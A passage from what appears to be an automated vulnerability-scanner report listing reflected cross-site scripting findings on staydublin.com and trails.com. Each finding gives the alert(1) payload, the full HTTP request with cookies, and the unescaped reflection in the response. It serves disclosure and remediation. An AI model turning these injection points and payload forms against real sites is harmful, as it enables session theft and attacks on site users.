<input name="hidquerystring" type="hidden" value="checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=183537"><script>alert(1)</script>1bd048d2213&kids=0&sleeps=7&search.x=17&search.y=4&search=search">
...[SNIP]...

2.181. http://www.staydublin.com/results.php [adults parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staydublin.com
Path:   /results.php

Issue detail

The value of the adults request parameter is copied into the HTML document as plain text between tags. The payload 37d22<script>alert(1)</script>5b1fce3fc8d was submitted in the adults parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.php?checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=137d22<script>alert(1)</script>5b1fce3fc8d&kids=0&sleeps=7&search.x=17&search.y=4&search=search HTTP/1.1
Host: www.staydublin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.staydublin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a4u1i8f54ad28m06v4jm9fvc7; X-Mapping-edafcnem=29FF71DCE66653D708D349C6064782BF; multitouch=www.mcafeesecure.com!referral!!1317388345; firstTouch=1317388354; __utma=83264596.1963542859.1317388346.1317388346.1317388346.1; __utmb=83264596.1.10.1317388346; __utmc=83264596; __utmz=83264596.1317388346.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=83264596.|1=ref-origin=www.mcafeesecure.com=1,2=ref-route=www.mcafeesecure.com=1,3=time-to-conversion=0=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:16:52 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: max-age=60, private, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 32216


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   <html lang="en">
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<span>137d22<script>alert(1)</script>5b1fce3fc8d adults</span>
...[SNIP]...

2.182. http://www.staydublin.com/results.php [kids parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staydublin.com
Path:   /results.php

Issue detail

The value of the kids request parameter is copied into the HTML document as plain text between tags. The payload 8b41e<script>alert(1)</script>e1507410506 was submitted in the kids parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.php?checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=08b41e<script>alert(1)</script>e1507410506&sleeps=7&search.x=17&search.y=4&search=search HTTP/1.1
Host: www.staydublin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.staydublin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a4u1i8f54ad28m06v4jm9fvc7; X-Mapping-edafcnem=29FF71DCE66653D708D349C6064782BF; multitouch=www.mcafeesecure.com!referral!!1317388345; firstTouch=1317388354; __utma=83264596.1963542859.1317388346.1317388346.1317388346.1; __utmb=83264596.1.10.1317388346; __utmc=83264596; __utmz=83264596.1317388346.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=83264596.|1=ref-origin=www.mcafeesecure.com=1,2=ref-route=www.mcafeesecure.com=1,3=time-to-conversion=0=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:16:55 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: max-age=60, private, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 32224


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   <html lang="en">
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<span>08b41e<script>alert(1)</script>e1507410506 children</span>
...[SNIP]...

2.183. http://www.staydublin.com/results.php [kids parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staydublin.com
Path:   /results.php

Issue detail

The value of the kids request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6892e"><script>alert(1)</script>a3ee92cd485 was submitted in the kids parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.php?checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=06892e"><script>alert(1)</script>a3ee92cd485&sleeps=7&search.x=17&search.y=4&search=search HTTP/1.1
Host: www.staydublin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.staydublin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a4u1i8f54ad28m06v4jm9fvc7; X-Mapping-edafcnem=29FF71DCE66653D708D349C6064782BF; multitouch=www.mcafeesecure.com!referral!!1317388345; firstTouch=1317388354; __utma=83264596.1963542859.1317388346.1317388346.1317388346.1; __utmb=83264596.1.10.1317388346; __utmc=83264596; __utmz=83264596.1317388346.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=83264596.|1=ref-origin=www.mcafeesecure.com=1,2=ref-route=www.mcafeesecure.com=1,3=time-to-conversion=0=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:16:54 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: max-age=60, private, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 32220


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   <html lang="en">
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<input name="hidquerystring" type="hidden" value="checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=06892e"><script>alert(1)</script>a3ee92cd485&sleeps=7&search.x=17&search.y=4&search=search">
...[SNIP]...

2.184. http://www.staydublin.com/results.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staydublin.com
Path:   /results.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58331"><script>alert(1)</script>5926df92112 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.php?checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=0&sleeps=7&search.x=17&search.y=4&search=search&58331"><script>alert(1)</script>5926df92112=1 HTTP/1.1
Host: www.staydublin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.staydublin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a4u1i8f54ad28m06v4jm9fvc7; X-Mapping-edafcnem=29FF71DCE66653D708D349C6064782BF; multitouch=www.mcafeesecure.com!referral!!1317388345; firstTouch=1317388354; __utma=83264596.1963542859.1317388346.1317388346.1317388346.1; __utmb=83264596.1.10.1317388346; __utmc=83264596; __utmz=83264596.1317388346.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=83264596.|1=ref-origin=www.mcafeesecure.com=1,2=ref-route=www.mcafeesecure.com=1,3=time-to-conversion=0=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:18 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: max-age=60, private, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 32188


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   <html lang="en">
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
idquerystring" type="hidden" value="checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=0&sleeps=7&search.x=17&search.y=4&search=search&58331"><script>alert(1)</script>5926df92112=1">
...[SNIP]...

2.185. http://www.staydublin.com/results.php [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staydublin.com
Path:   /results.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6306e"><script>alert(1)</script>c53841655dc was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.php?checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=0&sleeps=7&search.x=17&search.y=4&search=search6306e"><script>alert(1)</script>c53841655dc HTTP/1.1
Host: www.staydublin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.staydublin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a4u1i8f54ad28m06v4jm9fvc7; X-Mapping-edafcnem=29FF71DCE66653D708D349C6064782BF; multitouch=www.mcafeesecure.com!referral!!1317388345; firstTouch=1317388354; __utma=83264596.1963542859.1317388346.1317388346.1317388346.1; __utmb=83264596.1.10.1317388346; __utmc=83264596; __utmz=83264596.1317388346.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=83264596.|1=ref-origin=www.mcafeesecure.com=1,2=ref-route=www.mcafeesecure.com=1,3=time-to-conversion=0=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:03 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: max-age=60, private, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 32185


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   <html lang="en">
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
hidquerystring" type="hidden" value="checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=0&sleeps=7&search.x=17&search.y=4&search=search6306e"><script>alert(1)</script>c53841655dc">
...[SNIP]...

2.186. http://www.staydublin.com/results.php [search.x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staydublin.com
Path:   /results.php

Issue detail

The value of the search.x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c4f6"><script>alert(1)</script>98ee86f226 was submitted in the search.x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.php?checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=0&sleeps=7&search.x=173c4f6"><script>alert(1)</script>98ee86f226&search.y=4&search=search HTTP/1.1
Host: www.staydublin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.staydublin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a4u1i8f54ad28m06v4jm9fvc7; X-Mapping-edafcnem=29FF71DCE66653D708D349C6064782BF; multitouch=www.mcafeesecure.com!referral!!1317388345; firstTouch=1317388354; __utma=83264596.1963542859.1317388346.1317388346.1317388346.1; __utmb=83264596.1.10.1317388346; __utmc=83264596; __utmz=83264596.1317388346.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=83264596.|1=ref-origin=www.mcafeesecure.com=1,2=ref-route=www.mcafeesecure.com=1,3=time-to-conversion=0=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:16:59 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: max-age=60, private, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 32184


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   <html lang="en">
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<input name="hidquerystring" type="hidden" value="checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=0&sleeps=7&search.x=173c4f6"><script>alert(1)</script>98ee86f226&search.y=4&search=search">
...[SNIP]...

2.187. http://www.staydublin.com/results.php [search.y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staydublin.com
Path:   /results.php

Issue detail

The value of the search.y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cdf7"><script>alert(1)</script>72bc7c3e2cd was submitted in the search.y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.php?checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=0&sleeps=7&search.x=17&search.y=44cdf7"><script>alert(1)</script>72bc7c3e2cd&search=search HTTP/1.1
Host: www.staydublin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.staydublin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a4u1i8f54ad28m06v4jm9fvc7; X-Mapping-edafcnem=29FF71DCE66653D708D349C6064782BF; multitouch=www.mcafeesecure.com!referral!!1317388345; firstTouch=1317388354; __utma=83264596.1963542859.1317388346.1317388346.1317388346.1; __utmb=83264596.1.10.1317388346; __utmc=83264596; __utmz=83264596.1317388346.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=83264596.|1=ref-origin=www.mcafeesecure.com=1,2=ref-route=www.mcafeesecure.com=1,3=time-to-conversion=0=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:01 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: max-age=60, private, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 32185


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   <html lang="en">
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<input name="hidquerystring" type="hidden" value="checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=0&sleeps=7&search.x=17&search.y=44cdf7"><script>alert(1)</script>72bc7c3e2cd&search=search">
...[SNIP]...

2.188. http://www.staydublin.com/results.php [sleeps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staydublin.com
Path:   /results.php

Issue detail

The value of the sleeps request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29049"><script>alert(1)</script>9794c75943b was submitted in the sleeps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.php?checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=0&sleeps=729049"><script>alert(1)</script>9794c75943b&search.x=17&search.y=4&search=search HTTP/1.1
Host: www.staydublin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.staydublin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a4u1i8f54ad28m06v4jm9fvc7; X-Mapping-edafcnem=29FF71DCE66653D708D349C6064782BF; multitouch=www.mcafeesecure.com!referral!!1317388345; firstTouch=1317388354; __utma=83264596.1963542859.1317388346.1317388346.1317388346.1; __utmb=83264596.1.10.1317388346; __utmc=83264596; __utmz=83264596.1317388346.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=83264596.|1=ref-origin=www.mcafeesecure.com=1,2=ref-route=www.mcafeesecure.com=1,3=time-to-conversion=0=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:16:57 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: max-age=60, private, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 32185


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   <html lang="en">
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<input name="hidquerystring" type="hidden" value="checkin_day=01&checkin_month=10&checkin_year=2011&checkout_day=04&checkout_month=10&checkout_year=2011&adults=1&kids=0&sleeps=729049"><script>alert(1)</script>9794c75943b&search.x=17&search.y=4&search=search">
...[SNIP]...

2.189. http://www.trails.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7e13'-alert(1)-'f0f19caf64d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f7e13'-alert(1)-'f0f19caf64d=1 HTTP/1.1
Host: www.trails.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=16&c2=107
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 81093
Date: Fri, 30 Sep 2011 13:13:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
://cdn-www.trails.com',
                   jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%2f%3ff7e13'-alert(1)-'f0f19caf64d%3d1',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   n
...[SNIP]...

2.190. http://www.trails.com/activities.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /activities.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a3e'-alert(1)-'3341c3d72cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /activities.aspx73a3e'-alert(1)-'3341c3d72cf HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 23137
Expires: Fri, 30 Sep 2011 13:17:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 13:17:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
.com',
                   jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2factivities.aspx73a3e'-alert(1)-'3341c3d72cf',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...

2.191. http://www.trails.com/mytrails/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /mytrails/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c823'-alert(1)-'7b4dfcd18e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mytrails5c823'-alert(1)-'7b4dfcd18e4/ HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23127
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:17:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
.trails.com',
                   jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2fmytrails5c823'-alert(1)-'7b4dfcd18e4%2f',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   na
...[SNIP]...

2.192. http://www.trails.com/national-park-trails.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /national-park-trails.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7b66'-alert(1)-'63ab587bc78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /national-park-trails.aspxa7b66'-alert(1)-'63ab587bc78 HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 23157
Expires: Fri, 30 Sep 2011 13:17:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 13:17:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
           jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2fnational-park-trails.aspxa7b66'-alert(1)-'63ab587bc78',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...

2.193. http://www.trails.com/national-park-trails.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /national-park-trails.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ad8a'-alert(1)-'5b5fbeadc89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /national-park-trails.aspx?6ad8a'-alert(1)-'5b5fbeadc89=1 HTTP/1.1
Host: www.trails.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 30 Sep 2011 13:17:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34057


